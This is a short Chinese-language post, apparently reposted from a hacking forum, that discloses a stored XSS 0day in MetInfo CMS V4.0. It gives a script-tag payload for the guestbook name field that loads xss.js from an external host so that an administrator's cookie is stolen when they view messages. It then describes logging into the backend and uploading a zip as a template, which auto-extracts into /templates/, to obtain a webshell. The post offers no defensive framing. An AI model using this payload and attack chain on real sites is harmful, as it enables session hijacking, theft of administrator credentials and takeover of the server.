最新 MetInfo 企业网站管理系统 V4.0 XSS 0Day

2011-08-12

老系统内容 0day XSS 管理管理系统企业网站系统

约 151 字预计阅读 1 分钟

文章目录

Author: Noevil
Post To: T00ls.Net

发这个纯是为了测试这个东西（NoXss）：

利用方法，在线留言处：

名字填写： Noevil<SCRIPT SRC="HTTP://xxx/xss.js"></SCRIPT>

内容：随意。

后台管理员查看留言列表，自动截取Cookie，NoXss会努力的去Keep Session

登陆后台拿Shell：

添加模板，上传Zip，Zip里的东西会自动解压到 /templates/目录里。

剩下的你懂。

文章作者 Nuclear'Atk

上次更新 2011-08-12